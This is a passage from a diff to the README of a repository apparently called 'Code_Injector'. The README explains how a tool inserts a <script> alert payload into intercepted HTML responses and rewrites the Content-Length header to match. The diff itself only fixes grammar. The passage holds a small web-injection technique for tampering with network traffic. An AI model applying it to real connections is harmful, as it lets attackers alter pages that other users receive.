jezil2210/Code_Injector/README.md

    injection_code = "<script>alert('CODE INJECTOR SUCCSSESFULLY DONE')</script>"
    load = load.replace("</body>", injection_code + "</body>")
 ```
-Other importants details is change the length of the page because when a page is sent to someone it has a length and how it was changed because of the injecting code we have to change the verify if the load have the field content_length and recalculate the length adding the length of the injected code.
+Other importants details is change the length of the page because when a page is sent to someone it has a length and how it was changed because of the injecting code we have to change and verify if the load have the field content_length and recalculate the length adding the length of the injected code.
 ```python
    content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
             if content_length_search and "text/html" in load: